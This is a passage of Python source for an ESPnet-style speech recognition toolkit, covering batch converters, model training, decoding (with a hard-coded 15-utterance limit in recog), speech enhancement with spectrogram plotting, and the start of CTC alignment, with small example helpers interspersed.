np.array(y[0][:]) if isinstance(y, tuple) else y
).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_pad, ilens, ys_pad
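# A minimal usage sketch of CustomConverter with toy numpy features (hypothetical
# shapes; real batches come from make_batchset/LoadInputsAndTargets in train() below).
# Two utterances of different lengths are zero-padded to a common length, the raw
# input lengths are returned as ilens, and labels are padded with ignore_id (-1).
def _custom_converter_example():
    xs = [np.zeros((8, 40), dtype=np.float32), np.zeros((5, 40), dtype=np.float32)]
    ys = [np.array([1, 2, 3]), np.array([4, 5])]
    converter = CustomConverter(subsampling_factor=1, dtype=torch.float32)
    xs_pad, ilens, ys_pad = converter([(xs, ys)], device=torch.device("cpu"))
    # xs_pad: (2, 8, 40), ilens: tensor([8, 5]), ys_pad: (2, 3) padded with -1
    return xs_pad, ilens, ys_pad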
class CustomConverterMulEnc(object):
"""Custom batch converter for Pytorch in multi-encoder case.
Args:
subsampling_factors (list): List of subsampling factors for each encoder.
dtype (torch.dtype): Data type to convert.
"""
def __init__(self, subsampling_factors=[1, 1], dtype=torch.float32):
"""Initialize the converter."""
self.subsampling_factors = subsampling_factors
self.ignore_id = -1
self.dtype = dtype
self.num_encs = len(subsampling_factors)
def __call__(self, batch, device=torch.device("cpu")):
"""Transform a batch and send it to a device.
Args:
batch (list): The batch to transform.
device (torch.device): The device to send to.
Returns:
tuple( list(torch.Tensor), list(torch.Tensor), torch.Tensor)
"""
# batch should be located in list
assert len(batch) == 1
xs_list = batch[0][: self.num_encs]
ys = batch[0][-1]
# perform subsampling
if np.sum(self.subsampling_factors) > self.num_encs:
xs_list = [
[x[:: self.subsampling_factors[i], :] for x in xs_list[i]]
for i in range(self.num_encs)
]
# get batch of lengths of input sequences
ilens_list = [
np.array([x.shape[0] for x in xs_list[i]]) for i in range(self.num_encs)
]
# perform padding and convert to tensor
# currently only support real number
xs_list_pad = [
pad_list([torch.from_numpy(x).float() for x in xs_list[i]], 0).to(
device, dtype=self.dtype
)
for i in range(self.num_encs)
]
ilens_list = [
torch.from_numpy(ilens_list[i]).to(device) for i in range(self.num_encs)
]
# NOTE: this is for multi-task learning (e.g., speech translation)
ys_pad = pad_list(
[
torch.from_numpy(np.array(y[0]) if isinstance(y, tuple) else y).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_list_pad, ilens_list, ys_pad
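# A companion sketch for CustomConverterMulEnc (hypothetical toy shapes): the batch
# element carries one feature list per encoder followed by the label list, and the
# converter returns per-encoder padded tensors and length tensors plus a single ys_pad.
def _custom_converter_mulenc_example():
    xs_enc1 = [np.zeros((8, 40), dtype=np.float32), np.zeros((5, 40), dtype=np.float32)]
    xs_enc2 = [np.zeros((6, 20), dtype=np.float32), np.zeros((4, 20), dtype=np.float32)]
    ys = [np.array([1, 2, 3]), np.array([4, 5])]
    converter = CustomConverterMulEnc([1, 1], dtype=torch.float32)
    xs_list_pad, ilens_list, ys_pad = converter([[xs_enc1, xs_enc2, ys]], device=torch.device("cpu"))
    # xs_list_pad[0]: (2, 8, 40), xs_list_pad[1]: (2, 6, 20), ys_pad: (2, 3) padded with -1
    return xs_list_pad, ilens_list, ys_pad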
def train(args):
"""Train with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
if args.num_encs > 1:
args = format_mulenc_args(args)
# check cuda availability
if not torch.cuda.is_available():
logging.warning("cuda is not available")
# get input and output dimension info
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
utts = list(valid_json.keys())
idim_list = [
int(valid_json[utts[0]]["input"][i]["shape"][-1]) for i in range(args.num_encs)
]
odim = int(valid_json[utts[0]]["output"][0]["shape"][-1])
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
odim += 1 # for the <mask> token
for i in range(args.num_encs):
logging.info("stream{}: input dims : {}".format(i + 1, idim_list[i]))
logging.info("#output dims: " + str(odim))
# specify attention, CTC, hybrid mode
if "transducer" in args.model_module:
if (
getattr(args, "etype", False) == "transformer"
or getattr(args, "dtype", False) == "transformer"
):
mtl_mode = "transformer_transducer"
else:
mtl_mode = "transducer"
logging.info("Pure transducer mode")
elif args.mtlalpha == 1.0:
mtl_mode = "ctc"
logging.info("Pure CTC mode")
elif args.mtlalpha == 0.0:
mtl_mode = "att"
logging.info("Pure attention mode")
else:
mtl_mode = "mtl"
logging.info("Multitask learning mode")
if (args.enc_init is not None or args.dec_init is not None) and args.num_encs == 1:
model = load_trained_modules(idim_list[0], odim, args)
else:
model_class = dynamic_import(args.model_module)
model = model_class(
idim_list[0] if args.num_encs == 1 else idim_list, odim, args
)
assert isinstance(model, ASRInterface)
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
if args.rnnlm is not None:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(args.char_list), rnnlm_args.layer, rnnlm_args.unit)
)
torch_load(args.rnnlm, rnnlm)
model.rnnlm = rnnlm
# write model config
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
model_conf = args.outdir + "/model.json"
with open(model_conf, "wb") as f:
logging.info("writing a model config file to " + model_conf)
f.write(
json.dumps(
(idim_list[0] if args.num_encs == 1 else idim_list, odim, vars(args)),
indent=4,
ensure_ascii=False,
sort_keys=True,
).encode("utf_8")
)
for key in sorted(vars(args).keys()):
logging.info("ARGS: " + key + ": " + str(vars(args)[key]))
reporter = model.reporter
# check the use of multi-gpu
if args.ngpu > 1:
if args.batch_size != 0:
logging.warning(
"batch size is automatically increased (%d -> %d)"
% (args.batch_size, args.batch_size * args.ngpu)
)
args.batch_size *= args.ngpu
if args.num_encs > 1:
# TODO(ruizhili): implement data parallel for multi-encoder setup.
raise NotImplementedError(
"Data parallel is not supported for multi-encoder setup."
)
# set torch device
device = torch.device("cuda" if args.ngpu > 0 else "cpu")
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(device=device, dtype=dtype)
if args.freeze_mods:
model, model_params = freeze_modules(model, args.freeze_mods)
else:
model_params = model.parameters()
# Setup an optimizer
if args.opt == "adadelta":
optimizer = torch.optim.Adadelta(
model_params, rho=0.95, eps=args.eps, weight_decay=args.weight_decay
)
elif args.opt == "adam":
optimizer = torch.optim.Adam(model_params, weight_decay=args.weight_decay)
elif args.opt == "noam":
from espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt
# For transformer-transducer, adim declaration is within the block definition.
# Thus, we need to retrieve the most dominant value (d_hidden) for the Noam scheduler.
if hasattr(args, "enc_block_arch") or hasattr(args, "dec_block_arch"):
adim = model.most_dom_dim
else:
adim = args.adim
optimizer = get_std_opt(
model_params, adim, args.transformer_warmup_steps, args.transformer_lr
)
else:
raise NotImplementedError("unknown optimizer: " + args.opt)
# setup apex.amp
if args.train_dtype in ("O0", "O1", "O2", "O3"):
try:
from apex import amp
except ImportError as e:
logging.error(
f"You need to install apex for --train-dtype {args.train_dtype}. "
"See https://github.com/NVIDIA/apex#linux"
)
raise e
if args.opt == "noam":
model, optimizer.optimizer = amp.initialize(
model, optimizer.optimizer, opt_level=args.train_dtype
)
else:
model, optimizer = amp.initialize(
model, optimizer, opt_level=args.train_dtype
)
use_apex = True
from espnet.nets.pytorch_backend.ctc import CTC
amp.register_float_function(CTC, "loss_fn")
amp.init()
logging.warning("register ctc as float function")
else:
use_apex = False
# FIXME: TOO DIRTY HACK
setattr(optimizer, "target", reporter)
setattr(optimizer, "serialize", lambda s: reporter.serialize(s))
# Setup a converter
if args.num_encs == 1:
converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)
else:
converter = CustomConverterMulEnc(
[i[0] for i in model.subsample_list], dtype=dtype
)
# read json data
with open(args.train_json, "rb") as f:
train_json = json.load(f)["utts"]
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
use_sortagrad = args.sortagrad == -1 or args.sortagrad > 0
# make minibatch list (variable length)
train = make_batchset(
train_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
shortest_first=use_sortagrad,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
valid = make_batchset(
valid_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
load_tr = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": True}, # Switch the mode of preprocessing
)
load_cv = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": False}, # Switch the mode of preprocessing
)
# hack to force the DataLoader batch size to 1
# (the actual batch size is already encoded in each minibatch list);
# the default collate function converts numpy arrays to pytorch tensors,
# so we use an identity collate function that returns the list as-is
train_iter = ChainerDataLoader(
dataset=TransformDataset(train, lambda data: converter([load_tr(data)])),
batch_size=1,
num_workers=args.n_iter_processes,
shuffle=not use_sortagrad,
collate_fn=lambda x: x[0],
)
valid_iter = ChainerDataLoader(
dataset=TransformDataset(valid, lambda data: converter([load_cv(data)])),
batch_size=1,
shuffle=False,
collate_fn=lambda x: x[0],
num_workers=args.n_iter_processes,
)
# Set up a trainer
updater = CustomUpdater(
model,
args.grad_clip,
{"main": train_iter},
optimizer,
device,
args.ngpu,
args.grad_noise,
args.accum_grad,
use_apex=use_apex,
)
trainer = training.Trainer(updater, (args.epochs, "epoch"), out=args.outdir)
if use_sortagrad:
trainer.extend(
ShufflingEnabler([train_iter]),
trigger=(args.sortagrad if args.sortagrad != -1 else args.epochs, "epoch"),
)
# Resume from a snapshot
if args.resume:
logging.info("resumed from %s" % args.resume)
torch_resume(args.resume, trainer)
# Evaluate the model with the test dataset for each epoch
if args.save_interval_iters > 0:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu)
)
# Save attention weight each epoch
is_attn_plot = (
(
"transformer" in args.model_module
or "conformer" in args.model_module
or mtl_mode in ["att", "mtl"]
)
or (
mtl_mode == "transducer" and getattr(args, "rnnt_mode", False) == "rnnt-att"
)
or mtl_mode == "transformer_transducer"
)
if args.num_save_attention > 0 and is_attn_plot:
data = sorted(
list(valid_json.items())[: args.num_save_attention],
key=lambda x: int(x[1]["input"][0]["shape"][1]),
reverse=True,
)
if hasattr(model, "module"):
att_vis_fn = model.module.calculate_all_attentions
plot_class = model.module.attention_plot_class
else:
att_vis_fn = model.calculate_all_attentions
plot_class = model.attention_plot_class
att_reporter = plot_class(
att_vis_fn,
data,
args.outdir + "/att_ws",
converter=converter,
transform=load_cv,
device=device,
)
trainer.extend(att_reporter, trigger=(1, "epoch"))
else:
att_reporter = None
# Save CTC prob at each epoch
if mtl_mode in ["ctc", "mtl"] and args.num_save_ctc > 0:
# NOTE: sort it by output lengths
data = sorted(
list(valid_json.items())[: args.num_save_ctc],
key=lambda x: int(x[1]["output"][0]["shape"][0]),
reverse=True,
)
if hasattr(model, "module"):
ctc_vis_fn = model.module.calculate_all_ctc_probs
plot_class = model.module.ctc_plot_class
else:
ctc_vis_fn = model.calculate_all_ctc_probs
plot_class = model.ctc_plot_class
ctc_reporter = plot_class(
ctc_vis_fn,
data,
args.outdir + "/ctc_prob",
converter=converter,
transform=load_cv,
device=device,
ikey="output",
iaxis=1,
)
trainer.extend(ctc_reporter, trigger=(1, "epoch"))
else:
ctc_reporter = None
# Make a plot for training and validation values
if args.num_encs > 1:
report_keys_loss_ctc = [
"main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)]
report_keys_cer_ctc = [
"main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)]
trainer.extend(
extensions.PlotReport(
[
"main/loss",
"validation/main/loss",
"main/loss_ctc",
"validation/main/loss_ctc",
"main/loss_att",
"validation/main/loss_att",
]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="loss.png",
)
)
trainer.extend(
extensions.PlotReport(
["main/acc", "validation/main/acc"], "epoch", file_name="acc.png"
)
)
trainer.extend(
extensions.PlotReport(
["main/cer_ctc", "validation/main/cer_ctc"]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="cer.png",
)
)
# Save best models
trainer.extend(
snapshot_object(model, "model.loss.best"),
trigger=training.triggers.MinValueTrigger("validation/main/loss"),
)
if mtl_mode not in ["ctc", "transducer", "transformer_transducer"]:
trainer.extend(
snapshot_object(model, "model.acc.best"),
trigger=training.triggers.MaxValueTrigger("validation/main/acc"),
)
# save snapshot which contains model and optimizer states
if args.save_interval_iters > 0:
trainer.extend(
torch_snapshot(filename="snapshot.iter.{.updater.iteration}"),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(torch_snapshot(), trigger=(1, "epoch"))
# epsilon decay in the optimizer
if args.opt == "adadelta":
if args.criterion == "acc" and mtl_mode != "ctc":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.acc.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/acc",
lambda best_value, current_value: best_value > current_value,
),
)
elif args.criterion == "loss":
trainer.extend(
restore_snapshot(
model, args.outdir + "/model.loss.best", load_fn=torch_load
),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# NOTE: In some cases, it may take more than one epoch for the model's loss
# to escape from a local minimum.
# Thus, restore_snapshot extension is not used here.
# see details in https://github.com/espnet/espnet/pull/2171
elif args.criterion == "loss_eps_decay_only":
trainer.extend(
adadelta_eps_decay(args.eps_decay),
trigger=CompareValueTrigger(
"validation/main/loss",
lambda best_value, current_value: best_value < current_value,
),
)
# Write a log of evaluation statistics for each epoch
trainer.extend(
extensions.LogReport(trigger=(args.report_interval_iters, "iteration"))
)
report_keys = [
"epoch",
"iteration",
"main/loss",
"main/loss_ctc",
"main/loss_att",
"validation/main/loss",
"validation/main/loss_ctc",
"validation/main/loss_att",
"main/acc",
"validation/main/acc",
"main/cer_ctc",
"validation/main/cer_ctc",
"elapsed_time",
] + ([] if args.num_encs == 1 else report_keys_cer_ctc + report_keys_loss_ctc)
if args.opt == "adadelta":
trainer.extend(
extensions.observe_value(
"eps",
lambda trainer: trainer.updater.get_optimizer("main").param_groups[0][
"eps"
],
),
trigger=(args.report_interval_iters, "iteration"),
)
report_keys.append("eps")
if args.report_cer:
report_keys.append("validation/main/cer")
if args.report_wer:
report_keys.append("validation/main/wer")
trainer.extend(
extensions.PrintReport(report_keys),
trigger=(args.report_interval_iters, "iteration"),
)
trainer.extend(extensions.ProgressBar(update_interval=args.report_interval_iters))
set_early_stop(trainer, args)
if args.tensorboard_dir is not None and args.tensorboard_dir != "":
trainer.extend(
TensorboardLogger(
SummaryWriter(args.tensorboard_dir),
att_reporter=att_reporter,
ctc_reporter=ctc_reporter,
),
trigger=(args.report_interval_iters, "iteration"),
)
# Run the training
trainer.run()
check_early_stop(trainer, args.epochs)
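# A standalone sketch (hypothetical helper, mirroring the branching at the top of
# train() above) of how the training mode is chosen: transducer models are detected
# from the model module name, otherwise mtlalpha selects pure CTC (1.0), pure
# attention (0.0) or the hybrid multitask mode.
def _select_mtl_mode_example(model_module, mtlalpha, etype=None, dtype=None):
    if "transducer" in model_module:
        if etype == "transformer" or dtype == "transformer":
            return "transformer_transducer"
        return "transducer"
    if mtlalpha == 1.0:
        return "ctc"
    if mtlalpha == 0.0:
        return "att"
    return "mtl"
# e.g. _select_mtl_mode_example("e2e_asr_transformer:E2E", 0.3) -> "mtl"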
def recog(args):
"""Decode with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
if args.streaming_mode and "transformer" in train_args.model_module:
raise NotImplementedError("streaming mode for transformer is not implemented")
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError(
"use '--api v2' option to decode with non-default language model"
)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(train_args.char_list),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
if args.word_rnnlm:
rnnlm_args = get_model_conf(args.word_rnnlm, args.word_rnnlm_conf)
word_dict = rnnlm_args.char_list_dict
char_dict = {x: i for i, x in enumerate(train_args.char_list)}
word_rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(word_dict),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.word_rnnlm, word_rnnlm)
word_rnnlm.eval()
if rnnlm is not None:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.MultiLevelLM(
word_rnnlm.predictor, rnnlm.predictor, word_dict, char_dict
)
)
else:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.LookAheadWordLM(
word_rnnlm.predictor, word_dict, char_dict
)
)
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
# NOTE: limit the number of utterances to decode
F_data = {}
count = 0
for k, v in js.items():
# if js[k]['utt2spk'] == 'FC01':
if count < 15:
F_data[k] = v
count += 1
js = F_data
new_js = {}
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
# load transducer beam search
if hasattr(model, "rnnt_mode"):
if hasattr(model, "dec"):
trans_decoder = model.dec
else:
trans_decoder = model.decoder
beam_search_transducer = BeamSearchTransducer(
decoder=trans_decoder,
beam_size=args.beam_size,
lm=rnnlm,
lm_weight=args.lm_weight,
# search_type=args.search_type,
# max_sym_exp=args.max_sym_exp,
# u_max=args.u_max, # 50
# nstep=args.nstep,
# prefix_alpha=args.prefix_alpha,
# score_norm=args.score_norm,
)
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) decoding " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat = load_inputs_and_targets(batch)
feat = (
feat[0][0]
if args.num_encs == 1
else [feat[idx][0] for idx in range(model.num_encs)]
)
if args.streaming_mode == "window" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with window size %d frames",
args.streaming_window,
)
se2e = WindowStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
for i in range(0, feat.shape[0], args.streaming_window):
logging.info(
"Feeding frames %d - %d", i, i + args.streaming_window
)
se2e.accept_input(feat[i : i + args.streaming_window])
logging.info("Running offline attention decoder")
se2e.decode_with_attention_offline()
logging.info("Offline attention decoder finished")
nbest_hyps = se2e.retrieve_recognition()
elif args.streaming_mode == "segment" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with threshold value %d",
args.streaming_min_blank_dur,
)
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
elif hasattr(model, "decoder_mode") and model.decoder_mode == "maskctc":
nbest_hyps = model.recognize_maskctc(
feat, args, train_args.char_list
)
elif hasattr(model, "rnnt_mode"):
nbest_hyps = model.recognize(feat, beam_search_transducer)
else:
nbest_hyps = model.recognize(
feat, args, train_args.char_list, rnnlm
)
new_js[name] = add_results_to_json(
js[name], nbest_hyps, train_args.char_list
)
else:
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
# sort data if batchsize > 1
keys = list(js.keys())
if args.batchsize > 1:
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
with torch.no_grad():
for names in grouper(args.batchsize, keys, None):
names = [name for name in names if name]
batch = [(name, js[name]) for name in names]
feats = (
load_inputs_and_targets(batch)[0]
if args.num_encs == 1
else load_inputs_and_targets(batch)
)
if args.streaming_mode == "window" and args.num_encs == 1:
raise NotImplementedError
elif args.streaming_mode == "segment" and args.num_encs == 1:
if args.batchsize > 1:
raise NotImplementedError
feat = feats[0]
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
nbest_hyps = [nbest_hyps]
else:
nbest_hyps = model.recognize_batch(
feats, args, train_args.char_list, rnnlm=rnnlm
)
for i, nbest_hyp in enumerate(nbest_hyps):
name = names[i]
new_js[name] = add_results_to_json(
js[name], nbest_hyp, train_args.char_list
)
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
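# A standalone copy (for illustration only) of the grouper helper defined inside
# recog(): utterance keys are grouped into fixed-size batches and the final, possibly
# short, group is padded with the fill value, which recog() filters out again.
def _grouper_example(n, iterable, fillvalue=None):
    kargs = [iter(iterable)] * n
    return zip_longest(*kargs, fillvalue=fillvalue)
# e.g. list(_grouper_example(2, ["utt1", "utt2", "utt3"])) -> [("utt1", "utt2"), ("utt3", None)]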
def enhance(args):
"""Dumping enhanced speech and mask.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
# read training config
idim, odim, train_args = get_model_conf(args.model, args.model_conf)
# TODO(ruizhili): implement enhance for multi-encoder model
assert args.num_encs == 1, "number of encoders should be 1 ({} is given)".format(
args.num_encs
)
# load trained model parameters
logging.info("reading model parameters from " + args.model)
model_class = dynamic_import(train_args.model_module)
model = model_class(idim, odim, train_args)
assert isinstance(model, ASRInterface)
torch_load(args.model, model)
model.recog_args = args
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=None, # Apply pre_process in outer func
)
if args.batchsize == 0:
args.batchsize = 1
# Creates writers for outputs from the network
if args.enh_wspecifier is not None:
enh_writer = file_writer_helper(args.enh_wspecifier, filetype=args.enh_filetype)
else:
enh_writer = None
# Creates a Transformation instance
preprocess_conf = (
train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf
)
if preprocess_conf is not None:
logging.info(f"Use preprocessing: {preprocess_conf}")
transform = Transformation(preprocess_conf)
else:
transform = None
# Creates an IStft instance
istft = None
frame_shift = args.istft_n_shift  # Used for plotting the spectrogram
if args.apply_istft:
if preprocess_conf is not None:
# Read the conffile and find stft setting
with open(preprocess_conf) as f:
# Json format: e.g.
# {"process": [{"type": "stft",
# "win_length": 400,
# "n_fft": 512, "n_shift": 160,
# "window": "han"},
# {"type": "foo", ...}, ...]}
conf = json.load(f)
assert "process" in conf, conf
# Find stft setting
for p in conf["process"]:
if p["type"] == "stft":
istft = IStft(
win_length=p["win_length"],
n_shift=p["n_shift"],
window=p.get("window", "hann"),
)
logging.info(
"stft is found in {}. "
"Setting istft config from it\n{}".format(
preprocess_conf, istft
)
)
frame_shift = p["n_shift"]
break
if istft is None:
# Set from command line arguments
istft = IStft(
win_length=args.istft_win_length,
n_shift=args.istft_n_shift,
window=args.istft_window,
)
logging.info(
"Setting istft config from the command line args\n{}".format(istft)
)
# sort data
keys = list(js.keys())
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
num_images = 0
if not os.path.exists(args.image_dir):
os.makedirs(args.image_dir)
for names in grouper(args.batchsize, keys, None):
batch = [(name, js[name]) for name in names]
# May be in time region: (Batch, [Time, Channel])
org_feats = load_inputs_and_targets(batch)[0]
if transform is not None:
# May be in time-freq region: : (Batch, [Time, Channel, Freq])
feats = transform(org_feats, train=False)
else:
feats = org_feats
with torch.no_grad():
enhanced, mask, ilens = model.enhance(feats)
for idx, name in enumerate(names):
# Assuming mask, feats : [Batch, Time, Channel, Freq]
# enhanced : [Batch, Time, Freq]
enh = enhanced[idx][: ilens[idx]]
mas = mask[idx][: ilens[idx]]
feat = feats[idx]
# Plot spectrogram
if args.image_dir is not None and num_images < args.num_images:
import matplotlib.pyplot as plt
num_images += 1
ref_ch = 0
plt.figure(figsize=(20, 10))
plt.subplot(4, 1, 1)
plt.title("Mask [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
mas[:, ref_ch].T,
fs=args.fs,
mode="linear",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 2)
plt.title("Noisy speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
feat[:, ref_ch].T,
fs=args.fs,
mode="db",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 3)
plt.title("Masked speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
(feat[:, ref_ch] * mas[:, ref_ch]).T,
frame_shift=frame_shift,
fs=args.fs,
mode="db",
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 4)
plt.title("Enhanced speech")
plot_spectrogram(
plt, enh.T, fs=args.fs, mode="db", frame_shift=frame_shift
)
plt.savefig(os.path.join(args.image_dir, name + ".png"))
plt.clf()
# Write enhanced wave files
if enh_writer is not None:
if istft is not None:
enh = istft(enh)
else:
enh = enh
if args.keep_length:
if len(org_feats[idx]) < len(enh):
# Truncate the frames added by stft padding
enh = enh[: len(org_feats[idx])]
elif len(org_feats[idx]) > len(enh):
padwidth = [(0, (len(org_feats[idx]) - len(enh)))] + [
(0, 0)
] * (enh.ndim - 1)
enh = np.pad(enh, padwidth, mode="constant")
if args.enh_filetype in ("sound", "sound.hdf5"):
enh_writer[name] = (args.fs, enh)
else:
# Hint: To dump stft_signal, masks, etc.,
# enh_filetype='hdf5' might be convenient.
enh_writer[name] = enh
if num_images >= args.num_images and enh_writer is None:
logging.info("Breaking the process.")
break
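# A minimal sketch (hypothetical conf dict) of how enhance() above recovers istft
# settings: the "process" list of the preprocessing config is scanned for the first
# "stft" entry and its win_length / n_shift / window values are reused.
def _find_stft_settings_example():
    conf = {
        "process": [
            {"type": "stft", "win_length": 400, "n_fft": 512, "n_shift": 160, "window": "hann"},
            {"type": "fbank"},
        ]
    }
    for p in conf["process"]:
        if p["type"] == "stft":
            return p["win_length"], p["n_shift"], p.get("window", "hann")
    return None
# e.g. _find_stft_settings_example() -> (400, 160, "hann")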
def ctc_align(args):
"""CTC forced alignments with the given args.
Args:
args (namespace): The program arguments.
"""
def add_alignment_to_json(js, alignment, char_list):
"""Add N-best results to json.
Args:
js (dict[str, Any]): Groundtruth utterance dict.
alignment (list[int]): List of alignment.
char_list (list[str]): List of characters.
Returns:
dict[str, Any]: Utterance dict with the CTC alignment added.
"""
# build a new dict that holds only the alignment
new_js = dict()
new_js["ctc_alignment"] = []
alignment_tokens = []
for idx, a in enumerate(alignment):
alignment_tokens.append(char_list[a])
alignment_tokens = " ".join(alignment_tokens)
new_js["ctc_alignment"] = alignment_tokens
return new_js
set_deterministic_pytorch(args)
